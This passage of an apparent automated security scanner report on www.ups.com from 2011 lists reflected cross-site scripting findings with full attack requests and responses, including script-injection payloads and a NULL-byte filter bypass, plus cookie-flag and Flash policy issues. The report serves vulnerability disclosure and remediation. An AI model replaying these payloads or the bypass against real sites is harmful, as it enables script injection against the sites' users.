<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/uis4095b" a=b b63a7a57432/create?appid=UIS">
...[SNIP]...

1.187. https://www.ups.com/uis/create [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b1bd'%3b588801ad5 was submitted in the REST URL parameter 1. This input was echoed as 3b1bd';588801ad5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uis3b1bd'%3b588801ad5/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d5/create?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis3b1bd';588801ad5/create?appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/uis3b1bd';588801ad5/create?appid=UIS';
actionUrl = "/one-to-one/
...[SNIP]...

1.188. https://www.ups.com/uis/create [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 6b8b2%0ae3b2b84beb9 was submitted in the REST URL parameter 2. This input was echoed as 6b8b2
e3b2b84beb9
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uis/create6b8b2%0ae3b2b84beb9 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42152


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/uis/create6b8b2
e3b2b84beb9
?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis/create6b
...[SNIP]...

1.189. https://www.ups.com/uis/create [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e15"%20a%3db%2027a12099018 was submitted in the REST URL parameter 2. This input was echoed as b0e15" a=b 27a12099018 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/createb0e15"%20a%3db%2027a12099018 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:45 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42328


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/uis/createb0e15" a=b 27a12099018?appid=UIS">
...[SNIP]...

1.190. https://www.ups.com/uis/create [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1254a'%3bae2686a7b9a was submitted in the REST URL parameter 2. This input was echoed as 1254a';ae2686a7b9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uis/create1254a'%3bae2686a7b9a HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42244


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
9a?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis/create1254a';ae2686a7b9a?appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/uis/create1254a';ae2686a7b9a?appid=UIS';
actionUrl = "/one-to-one/login
...[SNIP]...

1.191. https://www.ups.com/uis/create [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001b991'-alert(1)-'d321cced5f0 was submitted in the loc parameter. This input was echoed as 1b991'-alert(1)-'d321cced5f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /uis/create?loc=en_US%001b991'-alert(1)-'d321cced5f0&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10310


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
ed5f0&appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1b991'-alert(1)-'d321cced5f0&appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_1b991'-alert(1)-'d321cced5f0&appid=UIS';
actionUrl = "/one-to-on
...[SNIP]...

1.192. https://www.ups.com/uis/create [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00796b6"><script>alert(1)</script>b4cf012dbf6 was submitted in the loc parameter. This input was echoed as 796b6"><script>alert(1)</script>b4cf012dbf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /uis/create?loc=en_US%00796b6"><script>alert(1)</script>b4cf012dbf6&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10886


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_796b6"><script>alert(1)</script>b4cf012dbf6&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_796b6%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb4cf012dbf6%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.193. https://www.ups.com/uis/create [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %008760f</script><script>alert(1)</script>e6835d0adba was submitted in the loc parameter. This input was echoed as 8760f</script><script>alert(1)</script>e6835d0adba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /uis/create?loc=en_US%008760f</script><script>alert(1)</script>e6835d0adba&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10986


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_8760f</script><script>alert(1)</script>e6835d0adba&appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_8760f
...[SNIP]...

1.194. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ups.com
Path:   /homepage/ddhandler/handler.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>19907ea315a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;
Referer: http://www.google.com/search?hl=en&q=db149"><script>alert(1)</script>19907ea315a

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:46 GMT
Server: Apache
Content-Length: 228
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.google.com/search?hl=en&q=db149"><script>alert(1)</script>19907ea315a">
</head>
<title>UPS.com</title>
<body>
Forwarding to sele
...[SNIP]...

1.195. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ups.com
Path:   /homepage/ddhandler/handler.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9602c"><script>alert(1)</script>52a22fcaf15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;
Referer: http://www.google.com/search?hl=en&q=9602c"><script>alert(1)</script>52a22fcaf15

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Content-Length: 228
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.google.com/search?hl=en&q=9602c"><script>alert(1)</script>52a22fcaf15">
</head>
<title>UPS.com</title>
<body>
Forwarding to sele
...[SNIP]...

2. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.ups.com
Path:   /upsemail/input

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /upsemail/input HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:01 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.upsemail.appSessionData=1rzXNYGJhy8lLHPvDNxHBJbyzlQG1DBZ1pNBKDB3W6vgQdDWNnbx!-2113502320!-1727859649!15501!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41817


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://www.ups.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ups.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:14:30 GMT
Server: Apache
Last-Modified: Sun, 04 Jan 2009 01:10:32 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: User-Agent
Connection: close
Content-Type: text/xml


<cross-domain-policy>
   <allow-access-from domain="*.ups.com" secure="false"/>
</cross-domain-policy>

3.2. https://www.ups.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ups.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:16:36 GMT
Server: Apache
Last-Modified: Fri, 02 Jan 2009 19:31:03 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: User-Agent
Connection: close
Content-Type: text/xml


<cross-domain-policy>
   <allow-access-from domain="*.ups.com" secure="false"/>
</cross-domain-policy>

4. Cookie without HttpOnly flag set  previous  next
There are 7 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.ups.com/pressroom/us/press_releases/press_release/Press+Releases/Current+Press+Releases/ci.UPS+Express+Freight+Service+Expands+into+Israel+and+Slovakia.syndication  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ups.com
Path:   /pressroom/us/press_releases/press_release/Press+Releases/Current+Press+Releases/ci.UPS+Express+Freight+Service+Expands+into+Israel+and+Slovakia.syndication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pressroom/us/press_releases/press_release/Press+Releases/Current+Press+Releases/ci.UPS+Express+Freight+Service+Expands+into+Israel+and+Slovakia.syndication HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: JSESSIONID=875ED31B0DEE37D8F173D692BBC68721; path=/
Set-Cookie: VignettePortal-NavTreeState-pressroom=""; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39265


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.2. http://www.ups.com/pressroom/us/press_releases/press_release/Press+Releases/Homepage+Press+Releases/ci.UPS+Capital+Expands+Latin+American+Network+with+New+Offices+in+Colombia+and+Peru.syndication  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ups.com
Path:   /pressroom/us/press_releases/press_release/Press+Releases/Homepage+Press+Releases/ci.UPS+Capital+Expands+Latin+American+Network+with+New+Offices+in+Colombia+and+Peru.syndication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pressroom/us/press_releases/press_release/Press+Releases/Homepage+Press+Releases/ci.UPS+Capital+Expands+Latin+American+Network+with+New+Offices+in+Colombia+and+Peru.syndication HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: JSESSIONID=C369137E4BDE9B000B785B657CCA7E92; path=/
Set-Cookie: VignettePortal-NavTreeState-pressroom=""; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38968


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.3. https://www.ups.com/upsemail/input  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ups.com
Path:   /upsemail/input

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /upsemail/input HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:01 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.upsemail.appSessionData=1rzXNYGJhy8lLHPvDNxHBJbyzlQG1DBZ1pNBKDB3W6vgQdDWNnbx!-2113502320!-1727859649!15501!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41817


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.4. http://www.ups.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes HTTP/1.1
Host: www.ups.com
Proxy-Connection: keep-alive
Referer: http://www.ups.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:15:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: defaultHome=us_en_home|1297646131685; domain=.ups.com; expires=Tuesday, 14-Feb-2012 01:15:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 124123


